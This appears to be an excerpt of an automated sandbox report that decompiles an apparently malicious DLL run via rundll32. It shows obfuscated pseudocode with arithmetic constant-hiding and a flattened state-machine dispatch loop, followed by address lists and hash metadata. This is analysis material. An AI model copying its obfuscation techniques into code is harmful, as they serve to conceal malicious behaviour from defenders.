                                                                                                                    				_v2640 = _v2640 ^ 0x008fd6f1;
                                                                                                                    				_v2716 = 0xebae10;
                                                                                                                    				_v2716 = _v2716 + 0x2e93;
                                                                                                                    				_v2716 = _v2716 >> 3;
                                                                                                                    				_v2716 = _v2716 ^ 0x0012b27f;
                                                                                                                    				_v2692 = 0xf4ef17;
                                                                                                                    				_v2692 = _v2692 ^ 0x14a8ca79;
                                                                                                                    				_v2692 = _v2692 ^ 0x145940a6;
                                                                                                                    				_v2712 = 0x90da21;
                                                                                                                    				_v2712 = _v2712 * 0x5c;
                                                                                                                    				_v2712 = _v2712 << 6;
                                                                                                                    				_v2712 = _v2712 ^ 0x039c340b;
                                                                                                                    				_v2812 = 0x599c06;
                                                                                                                    				_v2812 = _v2812 | 0x7b64813d;
                                                                                                                    				_v2812 = _v2812 * 0x3e;
                                                                                                                    				_v2812 = _v2812 ^ 0xe8633365;
                                                                                                                    				_v2748 = 0x57b46;
                                                                                                                    				_t744 = 0x38;
                                                                                                                    				_v2748 = _v2748 / _t744;
                                                                                                                    				_v2748 = _v2748 + 0xffffe4a2;
                                                                                                                    				_v2748 = _v2748 ^ 0xffff7983;
                                                                                                                    				_v2856 = 0xb347e1;
                                                                                                                    				_v2856 = _v2856 << 0xf;
                                                                                                                    				_v2856 = _v2856 + 0xc3e6;
                                                                                                                    				_v2856 = _v2856 ^ 0xcd6ff0ef;
                                                                                                                    				_v2856 = _v2856 ^ 0x6e991901;
                                                                                                                    				_v2756 = 0x3d21e7;
                                                                                                                    				_v2756 = _v2756 + 0x4052;
                                                                                                                    				_v2756 = _v2756 + 0xfab6;
                                                                                                                    				_v2756 = _v2756 ^ 0x0033d413;
                                                                                                                    				_v2680 = 0xeea097;
                                                                                                                    				_v2680 = _v2680 * 0x29;
                                                                                                                    				_v2680 = _v2680 ^ 0x26367c85;
                                                                                                                    				_v2852 = 0x9a84c7;
                                                                                                                    				_v2852 = _v2852 << 4;
                                                                                                                    				_v2852 = _v2852 + 0x5305;
                                                                                                                    				_v2852 = _v2852 * 0x47;
                                                                                                                    				_v2852 = _v2852 ^ 0xadc8f5b7;
                                                                                                                    				_v2736 = 0x1d92c0;
                                                                                                                    				_v2736 = _v2736 ^ 0x4e3febcd;
                                                                                                                    				_v2736 = _v2736 ^ 0x2a5eeaad;
                                                                                                                    				_v2736 = _v2736 ^ 0x647637b5;
                                                                                                                    				_v2916 = 0x7a6f6e;
                                                                                                                    				_v2916 = _v2916 << 3;
                                                                                                                    				_v2916 = _v2916 | 0x74549758;
                                                                                                                    				_v2916 = _v2916 * 0x5e;
                                                                                                                    				_v2916 = _v2916 ^ 0x014df6ca;
                                                                                                                    				_v2820 = 0x88f64;
                                                                                                                    				_v2820 = _v2820 << 0xb;
                                                                                                                    				_v2820 = _v2820 ^ 0x8d7f89a1;
                                                                                                                    				_v2820 = _v2820 ^ 0xc90720e1;
                                                                                                                    				_v2672 = 0x9d7b6a;
                                                                                                                    				_v2672 = _v2672 * 0x74;
                                                                                                                    				_v2672 = _v2672 ^ 0x47521deb;
                                                                                                                    				_v2868 = 0x2a980b;
                                                                                                                    				_v2868 = _v2868 << 2;
                                                                                                                    				_v2868 = _v2868 * 0x37;
                                                                                                                    				_v2868 = _v2868 * 0x45;
                                                                                                                    				_v2868 = _v2868 ^ 0xdda58f8d;
                                                                                                                    				_v2704 = 0xd94882;
                                                                                                                    				_v2704 = _v2704 >> 7;
                                                                                                                    				_v2704 = _v2704 ^ 0x000dd1c5;
                                                                                                                    				_v2908 = 0x8685cf;
                                                                                                                    				_v2908 = _v2908 >> 6;
                                                                                                                    				_v2908 = _v2908 + 0x478f;
                                                                                                                    				_v2908 = _v2908 | 0x9a4acbdf;
                                                                                                                    				_v2908 = _v2908 ^ 0x9a416c75;
                                                                                                                    				_v2724 = 0x3983d7;
                                                                                                                    				_v2724 = _v2724 ^ 0xaf8ece10;
                                                                                                                    				_v2724 = _v2724 + 0xfffffe8c;
                                                                                                                    				_v2724 = _v2724 ^ 0xafb9f002;
                                                                                                                    				_v2652 = 0xb48fd9;
                                                                                                                    				_v2652 = _v2652 >> 7;
                                                                                                                    				_v2652 = _v2652 ^ 0x0003170e;
                                                                                                                    				_v2732 = 0x26e706;
                                                                                                                    				_v2732 = _v2732 + 0xffff7cb3;
                                                                                                                    				_v2732 = _v2732 << 7;
                                                                                                                    				_v2732 = _v2732 ^ 0x13307998;
                                                                                                                    				_v2840 = 0xdaf489;
                                                                                                                    				_v2840 = _v2840 ^ 0x20b9ad9c;
                                                                                                                    				_v2840 = _v2840 + 0xa5fa;
                                                                                                                    				_v2840 = _v2840 ^ 0x206e4944;
                                                                                                                    				_v2848 = 0x15799;
                                                                                                                    				_v2848 = _v2848 + 0xffffbd76;
                                                                                                                    				_v2848 = _v2848 | 0x84cc3dff;
                                                                                                                    				_v2848 = _v2848 ^ 0x84c4ee28;
                                                                                                                    				_v2740 = 0x344f78;
                                                                                                                    				_v2740 = _v2740 | 0xed30b44e;
                                                                                                                    				_v2740 = _v2740 + 0x582d;
                                                                                                                    				_v2740 = _v2740 ^ 0xed3a4892;
                                                                                                                    				_v2764 = 0x3aec11;
                                                                                                                    				_t745 = 0x14;
                                                                                                                    				_v2764 = _v2764 * 0x24;
                                                                                                                    				_v2764 = _v2764 * 0xd;
                                                                                                                    				_v2764 = _v2764 ^ 0x6bb19aaa;
                                                                                                                    				_v2772 = 0xa2a4e3;
                                                                                                                    				_v2772 = _v2772 * 0x54;
                                                                                                                    				_v2772 = _v2772 + 0xd74c;
                                                                                                                    				_v2772 = _v2772 ^ 0x35517ae7;
                                                                                                                    				_v2780 = 0xc7cad3;
                                                                                                                    				_v2780 = _v2780 ^ 0xe16f0727;
                                                                                                                    				_v2780 = _v2780 + 0xa55f;
                                                                                                                    				_v2780 = _v2780 ^ 0xe1ad612a;
                                                                                                                    				_v2788 = 0x30bac2;
                                                                                                                    				_v2788 = _v2788 << 2;
                                                                                                                    				_v2788 = _v2788 * 0x19;
                                                                                                                    				_v2788 = _v2788 ^ 0x130f6af8;
                                                                                                                    				_v2708 = 0x5b81b7;
                                                                                                                    				_v2708 = _v2708 << 0xd;
                                                                                                                    				_v2708 = _v2708 ^ 0x7032fecb;
                                                                                                                    				_v2816 = 0xe0b39a;
                                                                                                                    				_v2816 = _v2816 + 0xf3c;
                                                                                                                    				_v2816 = _v2816 * 0x29;
                                                                                                                    				_v2816 = _v2816 ^ 0x23fa5b32;
                                                                                                                    				_v2832 = 0xb37143;
                                                                                                                    				_v2832 = _v2832 + 0xffff99de;
                                                                                                                    				_v2832 = _v2832 / _t745;
                                                                                                                    				_v2832 = _v2832 | 0xcb90c15e;
                                                                                                                    				_v2832 = _v2832 ^ 0xcb9cb56b;
                                                                                                                    				_v2824 = 0xf7e429;
                                                                                                                    				_v2824 = _v2824 << 0x10;
                                                                                                                    				_v2824 = _v2824 ^ 0x4b169193;
                                                                                                                    				_v2824 = _v2824 ^ 0xaf30b470;
                                                                                                                    				_t703 = E00347CDB(_t745);
                                                                                                                    				_t797 = _v2708;
                                                                                                                    				_t736 = _t703;
                                                                                                                    				while(1) {
                                                                                                                    					L1:
                                                                                                                    					do {
                                                                                                                    						while(1) {
                                                                                                                    							L2:
                                                                                                                    							_t811 = _t798 - 0xa06a9d5;
                                                                                                                    							if(_t811 <= 0) {
                                                                                                                    								break;
                                                                                                                    							}
                                                                                                                    							__eflags = _t798 - 0xae01df1;
                                                                                                                    							if(__eflags == 0) {
                                                                                                                    								_push(_v2740);
                                                                                                                    								_push(0);
                                                                                                                    								_push(_t745);
                                                                                                                    								_push(1);
                                                                                                                    								_push(0);
                                                                                                                    								_push(_v2848);
                                                                                                                    								_t745 = _v2732;
                                                                                                                    								_push( &_v524);
                                                                                                                    								E0033AB87(_t745, _v2840, __eflags);
                                                                                                                    								_t804 = _t804 + 0x1c;
                                                                                                                    								_t798 = 0xfe27958;
                                                                                                                    								_t707 = 0x8a3cf08;
                                                                                                                    								goto L24;
                                                                                                                    							} else {
                                                                                                                    								__eflags = _t798 - 0xb104717;
                                                                                                                    								if(_t798 == 0xb104717) {
                                                                                                                    									_t745 = _v2748;
                                                                                                                    									_t708 = E00334816(_t745, _v2632, _v2856, _v2636, _v2756, _v2680);
                                                                                                                    									_t797 = _t708;
                                                                                                                    									_t804 = _t804 + 0x10;
                                                                                                                    									__eflags = _t708;
                                                                                                                    									_t707 = 0x8a3cf08;
                                                                                                                    									_t798 =  !=  ? 0x8a3cf08 : 0xa06a9d5;
                                                                                                                    									continue;
                                                                                                                    								} else {
                                                                                                                    									__eflags = _t798 - 0xe3ea8aa;
                                                                                                                    									if(_t798 == 0xe3ea8aa) {
                                                                                                                    										return E00341E67(_v2708, _v2816, _v2832, _v2824, _v2628);
                                                                                                                    									}
                                                                                                                    									__eflags = _t798 - 0xfe27958;
                                                                                                                    									if(_t798 != 0xfe27958) {
                                                                                                                    										goto L24;
                                                                                                                    									} else {
                                                                                                                    										E00348519(_v2764, _v2772, _t797);
                                                                                                                    										_pop(_t745);
                                                                                                                    										_t798 = 0xa06a9d5;
                                                                                                                    										while(1) {
                                                                                                                    											L1:
                                                                                                                    											goto L2;
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    							L27:
                                                                                                                    							return _t717;
                                                                                                                    						}
                                                                                                                    						if(_t811 == 0) {
                                                                                                                    							E00348519(_v2780, _v2788, _v2636);
                                                                                                                    							_pop(_t745);
                                                                                                                    							_t798 = 0xe3ea8aa;
                                                                                                                    							while(1) {
                                                                                                                    								L1:
                                                                                                                    								goto L2;
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						if(_t798 == 0xce4571) {
                                                                                                                    							_push(_v2700);
                                                                                                                    							_push(_v2696);
                                                                                                                    							_push(_v2688);
                                                                                                                    							_t745 = _v2796;
                                                                                                                    							_push( &_v1044);
                                                                                                                    							E003446BB(_t745, _v2864);
                                                                                                                    							_t804 = _t804 - 0xc + 0x1c;
                                                                                                                    							_t798 = 0x2f0d176;
                                                                                                                    							while(1) {
                                                                                                                    								L1:
                                                                                                                    								goto L2;
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						if(_t798 == 0x277711d) {
                                                                                                                    							_v2624 = E003359E9();
                                                                                                                    							_v2620 = 2 + E0033CB52(_v2668, _t714, _v2828, _v2768, _v2880) * 2;
                                                                                                                    							_t745 =  &_v2628;
                                                                                                                    							_t717 = E00348727(_t745, _v2804, _v2668, _v2872, _v2808, _v2668, _v2644, _t736, _t736, _v2760, _t736, _v2660, _v2640);
                                                                                                                    							_t804 = _t804 + 0x38;
                                                                                                                    							__eflags = _t717;
                                                                                                                    							if(__eflags != 0) {
                                                                                                                    								_t798 = 0x47e8611;
                                                                                                                    								goto L1;
                                                                                                                    							}
                                                                                                                    						} else {
                                                                                                                    							if(_t798 == 0x2f0d176) {
                                                                                                                    								E0034DA22(_v2684, _v2836, __eflags, _v2664,  &_v2084, _t745, _v2900);
                                                                                                                    								 *((short*)(E0033B6CF( &_v2084, _v2752, _v2656, _v2800))) = 0;
                                                                                                                    								E00338969(_v2892,  &_v1564, __eflags, _v2728, _v2792);
                                                                                                                    								_push(_v2860);
                                                                                                                    								_push(_v2784);
                                                                                                                    								E003347CE( &_v2084, _v2920, _v2884, _v2676, _v2928, E0034DCF7(_v2884, 0x331308, __eflags),  &_v1564, _v2844, _v2744);
                                                                                                                    								E0033A8B0(_v2904, _t722, _v2912);
                                                                                                                    								_t745 = _v2888;
                                                                                                                    								_t717 = E0033EA99(_t745, _t803, _v2776, _v2648,  &_v2604, _v2896);
                                                                                                                    								_t804 = _t804 + 0x5c;
                                                                                                                    								__eflags = _t717;
                                                                                                                    								if(__eflags != 0) {
                                                                                                                    									_t798 = 0x277711d;
                                                                                                                    									while(1) {
                                                                                                                    										L1:
                                                                                                                    										goto L2;
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							} else {
                                                                                                                    								if(_t798 == 0x47e8611) {
                                                                                                                    									_t745 =  &_v2636;
                                                                                                                    									E0034DEDC(_t745, _v2716, _v2692, _v2712,  &_v2628, _v2812);
                                                                                                                    									_t804 = _t804 + 0x10;
                                                                                                                    									asm("sbb esi, esi");
                                                                                                                    									_t798 = (_t798 & 0xfcd19e6d) + 0xe3ea8aa;
                                                                                                                    									while(1) {
                                                                                                                    										L1:
                                                                                                                    										goto L2;
                                                                                                                    									}
                                                                                                                    								} else {
                                                                                                                    									_t816 = _t798 - _t707;
                                                                                                                    									if(_t798 != _t707) {
                                                                                                                    										goto L24;
                                                                                                                    									} else {
                                                                                                                    										_push(_v2916);
                                                                                                                    										_push(_v2736);
                                                                                                                    										_t730 = E0034DCF7(_v2852, 0x3313f8, _t816);
                                                                                                                    										_pop(_t758);
                                                                                                                    										E0034453F(_v2820, _t816, _v2672, _t730, _v2868,  &_v1044, _t758, _v2704, _v2908, _t797,  &_v2604);
                                                                                                                    										_t804 = _t804 + 0x24;
                                                                                                                    										E0033A8B0(_v2724, _t730, _v2652);
                                                                                                                    										_pop(_t745);
                                                                                                                    										_t798 = 0xae01df1;
                                                                                                                    										while(1) {
                                                                                                                    											L1:
                                                                                                                    											goto L2;
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						goto L27;
                                                                                                                    						L24:
                                                                                                                    						__eflags = _t798 - 0xe39a6fa;
                                                                                                                    					} while (__eflags != 0);
                                                                                                                    					return _t707;
                                                                                                                    				}
                                                                                                                    			}
                                                                                                                    0x00344f41
                                                                                                                    0x00344f45
                                                                                                                    0x00344f4a
                                                                                                                    0x00344f52
                                                                                                                    0x00344f5f
                                                                                                                    0x00344f63
                                                                                                                    0x00344f70
                                                                                                                    0x00344f74
                                                                                                                    0x00344f7c
                                                                                                                    0x00344f87
                                                                                                                    0x00344f8e
                                                                                                                    0x00344f99
                                                                                                                    0x00344fa4
                                                                                                                    0x00344fb4
                                                                                                                    0x00344fbc
                                                                                                                    0x00344fbf
                                                                                                                    0x00344fc3
                                                                                                                    0x00344fc8
                                                                                                                    0x00344fd0
                                                                                                                    0x00344fd8
                                                                                                                    0x00344fdd
                                                                                                                    0x00344fe2
                                                                                                                    0x00344fea
                                                                                                                    0x00344ff2
                                                                                                                    0x00344ffa
                                                                                                                    0x00345002
                                                                                                                    0x0034500a
                                                                                                                    0x00345012
                                                                                                                    0x0034501a
                                                                                                                    0x00345025
                                                                                                                    0x00345032
                                                                                                                    0x00345039
                                                                                                                    0x00345044
                                                                                                                    0x0034504f
                                                                                                                    0x0034505a
                                                                                                                    0x00345065
                                                                                                                    0x0034506d
                                                                                                                    0x00345072
                                                                                                                    0x0034507a
                                                                                                                    0x00345082
                                                                                                                    0x0034508a
                                                                                                                    0x00345095
                                                                                                                    0x003450a0
                                                                                                                    0x003450ab
                                                                                                                    0x003450b6
                                                                                                                    0x003450c1
                                                                                                                    0x003450c8
                                                                                                                    0x003450d3
                                                                                                                    0x003450e2
                                                                                                                    0x003450e5
                                                                                                                    0x003450e9
                                                                                                                    0x003450f1
                                                                                                                    0x003450f9
                                                                                                                    0x00345104
                                                                                                                    0x0034510c
                                                                                                                    0x00345117
                                                                                                                    0x00345122
                                                                                                                    0x0034512a
                                                                                                                    0x0034513a
                                                                                                                    0x0034513e
                                                                                                                    0x00345146
                                                                                                                    0x0034514e
                                                                                                                    0x00345156
                                                                                                                    0x0034515e
                                                                                                                    0x00345166
                                                                                                                    0x0034516b
                                                                                                                    0x00345173
                                                                                                                    0x00345186
                                                                                                                    0x00345187
                                                                                                                    0x0034518e
                                                                                                                    0x00345199
                                                                                                                    0x003451a4
                                                                                                                    0x003451af
                                                                                                                    0x003451ba
                                                                                                                    0x003451c5
                                                                                                                    0x003451d0
                                                                                                                    0x003451db
                                                                                                                    0x003451e6
                                                                                                                    0x003451f1
                                                                                                                    0x003451fc
                                                                                                                    0x00345205
                                                                                                                    0x0034520c
                                                                                                                    0x00345217
                                                                                                                    0x00345222
                                                                                                                    0x0034522d
                                                                                                                    0x00345238
                                                                                                                    0x00345243
                                                                                                                    0x0034524e
                                                                                                                    0x00345256
                                                                                                                    0x00345261
                                                                                                                    0x0034526c
                                                                                                                    0x00345277
                                                                                                                    0x00345282
                                                                                                                    0x00345295
                                                                                                                    0x0034529c
                                                                                                                    0x003452a4
                                                                                                                    0x003452af
                                                                                                                    0x003452ba
                                                                                                                    0x003452cd
                                                                                                                    0x003452d4
                                                                                                                    0x003452e1
                                                                                                                    0x003452f5
                                                                                                                    0x003452f8
                                                                                                                    0x003452ff
                                                                                                                    0x0034530a
                                                                                                                    0x00345315
                                                                                                                    0x0034531d
                                                                                                                    0x00345322
                                                                                                                    0x0034532a
                                                                                                                    0x00345332
                                                                                                                    0x0034533a
                                                                                                                    0x00345345
                                                                                                                    0x00345350
                                                                                                                    0x0034535b
                                                                                                                    0x00345366
                                                                                                                    0x00345379
                                                                                                                    0x00345380
                                                                                                                    0x0034538b
                                                                                                                    0x00345393
                                                                                                                    0x00345398
                                                                                                                    0x003453a5
                                                                                                                    0x003453a9
                                                                                                                    0x003453b1
                                                                                                                    0x003453bc
                                                                                                                    0x003453c7
                                                                                                                    0x003453d2
                                                                                                                    0x003453dd
                                                                                                                    0x003453e5
                                                                                                                    0x003453ea
                                                                                                                    0x003453f7
                                                                                                                    0x003453fb
                                                                                                                    0x00345403
                                                                                                                    0x0034540e
                                                                                                                    0x00345416
                                                                                                                    0x00345421
                                                                                                                    0x0034542c
                                                                                                                    0x0034543f
                                                                                                                    0x00345446
                                                                                                                    0x00345451
                                                                                                                    0x00345459
                                                                                                                    0x00345463
                                                                                                                    0x0034546c
                                                                                                                    0x00345470
                                                                                                                    0x00345478
                                                                                                                    0x00345483
                                                                                                                    0x0034548b
                                                                                                                    0x00345496
                                                                                                                    0x0034549e
                                                                                                                    0x003454a3
                                                                                                                    0x003454ab
                                                                                                                    0x003454b3
                                                                                                                    0x003454bb
                                                                                                                    0x003454c6
                                                                                                                    0x003454d1
                                                                                                                    0x003454dc
                                                                                                                    0x003454e7
                                                                                                                    0x003454f2
                                                                                                                    0x003454fa
                                                                                                                    0x00345505
                                                                                                                    0x00345510
                                                                                                                    0x0034551b
                                                                                                                    0x00345523
                                                                                                                    0x0034552e
                                                                                                                    0x0034553e
                                                                                                                    0x00345546
                                                                                                                    0x0034554e
                                                                                                                    0x00345556
                                                                                                                    0x00345568
                                                                                                                    0x00345570
                                                                                                                    0x00345578
                                                                                                                    0x00345580
                                                                                                                    0x0034558b
                                                                                                                    0x00345596
                                                                                                                    0x003455a1
                                                                                                                    0x003455ac
                                                                                                                    0x003455c1
                                                                                                                    0x003455c2
                                                                                                                    0x003455d1
                                                                                                                    0x003455d8
                                                                                                                    0x003455e3
                                                                                                                    0x003455f6
                                                                                                                    0x003455fd
                                                                                                                    0x00345608
                                                                                                                    0x00345613
                                                                                                                    0x0034561e
                                                                                                                    0x00345629
                                                                                                                    0x00345634
                                                                                                                    0x0034563f
                                                                                                                    0x0034564a
                                                                                                                    0x0034565a
                                                                                                                    0x00345661
                                                                                                                    0x0034566c
                                                                                                                    0x00345677
                                                                                                                    0x0034567f
                                                                                                                    0x0034568a
                                                                                                                    0x00345695
                                                                                                                    0x003456a8
                                                                                                                    0x003456af
                                                                                                                    0x003456ba
                                                                                                                    0x003456c2
                                                                                                                    0x003456d0
                                                                                                                    0x003456d4
                                                                                                                    0x003456dc
                                                                                                                    0x003456e4
                                                                                                                    0x003456ec
                                                                                                                    0x003456f1
                                                                                                                    0x003456f9
                                                                                                                    0x00345709
                                                                                                                    0x0034570e
                                                                                                                    0x00345715
                                                                                                                    0x00345717
                                                                                                                    0x00345717
                                                                                                                    0x0034571c
                                                                                                                    0x0034571c
                                                                                                                    0x0034571c
                                                                                                                    0x0034571c
                                                                                                                    0x00345722
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00345a30

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FolderPath
                                                                                                                    • String ID: -X$8ZD$8ZD$:%$>`U$@Y$DIn $G4%>$R@$[z}~$_p$e3c$noz$~wP`$!=$'$zQ5
                                                                                                                    • API String ID: 1514166925-3442493123
                                                                                                                    • Opcode ID: 0b3b6c2e372957a82da72871aa8244d8bd81b2c01920e019625259ec04cc01fb
                                                                                                                    • Instruction ID: b303a48df4ac2ed9e166ac3819f12d96a927d0752844a4222b4c4038e3f4b99f
                                                                                                                    • Opcode Fuzzy Hash: 0b3b6c2e372957a82da72871aa8244d8bd81b2c01920e019625259ec04cc01fb
                                                                                                                    • Instruction Fuzzy Hash: 1572F0714083819FD3B9CF25C58AB9BBBE1BBC4318F108A1DE1DA96260D7B49949CF43
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 98%
                                                                                                                    			E00342550() {
                                                                                                                    				signed int _v28;
                                                                                                                    				char _v36;
                                                                                                                    				char _v84;
                                                                                                                    				signed int _v100;
                                                                                                                    				signed int _v104;
                                                                                                                    				signed int _v112;
                                                                                                                    				signed int _v124;
                                                                                                                    				signed int _v140;
                                                                                                                    				intOrPtr _v144;
                                                                                                                    				char _v152;
                                                                                                                    				signed int _v172;
                                                                                                                    				char _v180;
                                                                                                                    				char _v188;
                                                                                                                    				char _v192;
                                                                                                                    				char _v196;
                                                                                                                    				char _v200;
                                                                                                                    				char _v204;
                                                                                                                    				signed int _v208;
                                                                                                                    				signed int _v212;
                                                                                                                    				signed int _v216;
                                                                                                                    				signed int _v220;
                                                                                                                    				signed int _v224;
                                                                                                                    				signed int _v228;
                                                                                                                    				signed int _v232;
                                                                                                                    				signed int _v236;
                                                                                                                    				signed int _v240;
                                                                                                                    				signed int _v244;
                                                                                                                    				signed int _v248;
                                                                                                                    				signed int _v252;
                                                                                                                    				signed int _v256;
                                                                                                                    				signed int _v260;
                                                                                                                    				signed int _v264;
                                                                                                                    				signed int _v268;
                                                                                                                    				signed int _v272;
                                                                                                                    				signed int _v276;
                                                                                                                    				signed int _v280;
                                                                                                                    				signed int _v284;
                                                                                                                    				signed int _v288;
                                                                                                                    				unsigned int _v292;
                                                                                                                    				signed int _v296;
                                                                                                                    				signed int _v300;
                                                                                                                    				signed int _v304;
                                                                                                                    				signed int _v308;
                                                                                                                    				signed int _v312;
                                                                                                                    				signed int _v316;
                                                                                                                    				signed int _v320;
                                                                                                                    				signed int _v324;
                                                                                                                    				signed int _v328;
                                                                                                                    				signed int _v332;
                                                                                                                    				signed int _v336;
                                                                                                                    				signed int _v340;
                                                                                                                    				signed int _v344;
                                                                                                                    				signed int _v348;
                                                                                                                    				signed int _v352;
                                                                                                                    				signed int _v356;
                                                                                                                    				signed int _v360;
                                                                                                                    				signed int _v364;
                                                                                                                    				signed int _v368;
                                                                                                                    				signed int _v372;
                                                                                                                    				signed int _v376;
                                                                                                                    				signed int _v380;
                                                                                                                    				signed int _v384;
                                                                                                                    				signed int _v388;
                                                                                                                    				signed int _v392;
                                                                                                                    				unsigned int _v396;
                                                                                                                    				signed int _v400;
                                                                                                                    				signed int _v404;
                                                                                                                    				signed int _v408;
                                                                                                                    				signed int _v412;
                                                                                                                    				signed int _v416;
                                                                                                                    				signed int _v420;
                                                                                                                    				signed int _v424;
                                                                                                                    				signed int _v428;
                                                                                                                    				signed int _v432;
                                                                                                                    				signed int _v436;
                                                                                                                    				signed int _v440;
                                                                                                                    				signed int _v444;
                                                                                                                    				signed int _v448;
                                                                                                                    				signed int _v452;
                                                                                                                    				signed int _v456;
                                                                                                                    				signed int _v460;
                                                                                                                    				signed int _v464;
                                                                                                                    				signed int _v468;
                                                                                                                    				signed int _v472;
                                                                                                                    				signed int _v476;
                                                                                                                    				signed int _v480;
                                                                                                                    				unsigned int _v484;
                                                                                                                    				unsigned int _v488;
                                                                                                                    				signed int _v492;
                                                                                                                    				signed int _v496;
                                                                                                                    				signed int _v500;
                                                                                                                    				signed int _v504;
                                                                                                                    				signed int _v508;
                                                                                                                    				unsigned int _v512;
                                                                                                                    				signed int _v516;
                                                                                                                    				signed int _v520;
                                                                                                                    				signed int _v524;
                                                                                                                    				signed int _v528;
                                                                                                                    				unsigned int _v532;
                                                                                                                    				signed int _v536;
                                                                                                                    				signed int _v540;
                                                                                                                    				unsigned int _v544;
                                                                                                                    				signed int _v548;
                                                                                                                    				unsigned int _v552;
                                                                                                                    				signed int _v556;
                                                                                                                    				signed int _v560;
                                                                                                                    				signed int _v564;
                                                                                                                    				signed int _v568;
                                                                                                                    				signed int _v572;
                                                                                                                    				unsigned int _v576;
                                                                                                                    				signed int _v580;
                                                                                                                    				signed int _v584;
                                                                                                                    				unsigned int _v588;
                                                                                                                    				unsigned int _v592;
                                                                                                                    				signed int _v596;
                                                                                                                    				signed int _v600;
                                                                                                                    				signed int _v604;
                                                                                                                    				signed int _v608;
                                                                                                                    				signed int _v612;
                                                                                                                    				signed int _v616;
                                                                                                                    				signed int _v620;
                                                                                                                    				signed int _v624;
                                                                                                                    				signed int _v628;
                                                                                                                    				signed int _v632;
                                                                                                                    				signed int _v636;
                                                                                                                    				signed int _t1114;
                                                                                                                    				signed int _t1118;
                                                                                                                    				signed int _t1122;
                                                                                                                    				signed int _t1124;
                                                                                                                    				signed int _t1125;
                                                                                                                    				signed int _t1130;
                                                                                                                    				void* _t1134;
                                                                                                                    				signed int _t1141;
                                                                                                                    				signed int _t1190;
                                                                                                                    				signed int _t1191;
                                                                                                                    				signed int _t1193;
                                                                                                                    				signed int _t1194;
                                                                                                                    				signed int _t1195;
                                                                                                                    				signed int _t1196;
                                                                                                                    				signed int _t1197;
                                                                                                                    				signed int _t1198;
                                                                                                                    				signed int _t1199;
                                                                                                                    				signed int _t1200;
                                                                                                                    				signed int _t1201;
                                                                                                                    				signed int _t1202;
                                                                                                                    				signed int _t1203;
                                                                                                                    				signed int _t1204;
                                                                                                                    				signed int _t1205;
                                                                                                                    				signed int _t1206;
                                                                                                                    				signed int _t1207;
                                                                                                                    				signed int _t1208;
                                                                                                                    				signed int _t1209;
                                                                                                                    				signed int _t1210;
                                                                                                                    				signed int _t1211;
                                                                                                                    				signed int _t1212;
                                                                                                                    				signed int _t1213;
                                                                                                                    				signed int _t1214;
                                                                                                                    				signed int _t1215;
                                                                                                                    				signed int _t1313;
                                                                                                                    				signed int _t1314;
                                                                                                                    				signed int _t1317;
                                                                                                                    				signed int _t1343;
                                                                                                                    				void* _t1345;
                                                                                                                    				void* _t1348;
                                                                                                                    				void* _t1349;
                                                                                                                    				void* _t1350;
                                                                                                                    
                                                                                                                    				_t1345 = (_t1343 & 0xfffffff8) - 0x278;
                                                                                                                    				_v372 = 0xaca17;
                                                                                                                    				_v372 = _v372 << 9;
                                                                                                                    				_v372 = _v372 ^ 0xc9927700;
                                                                                                                    				_v372 = _v372 ^ 0xdc065802;
                                                                                                                    				_v560 = 0xa158a0;
                                                                                                                    				_v560 = _v560 + 0xffff5dcd;
                                                                                                                    				_v560 = _v560 ^ 0x175bafac;
                                                                                                                    				_v560 = _v560 + 0xffff9e49;
                                                                                                                    				_v560 = _v560 ^ 0x17fab80a;
                                                                                                                    				_v288 = 0xd4a9a6;
                                                                                                                    				_v288 = _v288 >> 3;
                                                                                                                    				_v288 = _v288 ^ 0x001a9534;
                                                                                                                    				_v504 = 0xe9a5d3;
                                                                                                                    				_v504 = _v504 << 0xa;
                                                                                                                    				_v504 = _v504 | 0xea5982c0;
                                                                                                                    				_t1190 = 0x5f;
                                                                                                                    				_v504 = _v504 / _t1190;
                                                                                                                    				_v504 = _v504 ^ 0x028f5db6;
                                                                                                                    				_t1317 = 0x5d794ec;
                                                                                                                    				_v304 = 0x85b0a3;
                                                                                                                    				_v304 = _v304 | 0x2bca024a;
                                                                                                                    				_v304 = _v304 ^ 0x2bcc012b;
                                                                                                                    				_v556 = 0x1ecc82;
                                                                                                                    				_v556 = _v556 | 0xf08df0d8;
                                                                                                                    				_v556 = _v556 + 0xa531;
                                                                                                                    				_v556 = _v556 ^ 0xfe698427;
                                                                                                                    				_v556 = _v556 ^ 0x0ecdaa65;
                                                                                                                    				_v300 = 0x8f610e;
                                                                                                                    				_v300 = _v300 + 0xfe33;
                                                                                                                    				_v300 = _v300 ^ 0x0094e207;
                                                                                                                    				_v600 = 0x1cab4a;
                                                                                                                    				_t1193 = 0x18;
                                                                                                                    				_v600 = _v600 / _t1193;
                                                                                                                    				_v600 = _v600 + 0xffff3801;
                                                                                                                    				_v600 = _v600 + 0x515c;
                                                                                                                    				_v600 = _v600 ^ 0x0001e7c9;
                                                                                                                    				_v568 = 0xbab742;
                                                                                                                    				_v568 = _v568 + 0xcc5d;
                                                                                                                    				_v568 = _v568 | 0x5c48aa02;
                                                                                                                    				_t1194 = 0x5e;
                                                                                                                    				_v568 = _v568 / _t1194;
                                                                                                                    				_v568 = _v568 ^ 0x00f9db2d;
                                                                                                                    				_v576 = 0x767b63;
                                                                                                                    				_v576 = _v576 >> 3;
                                                                                                                    				_v576 = _v576 + 0xd487;
                                                                                                                    				_v576 = _v576 >> 0x10;
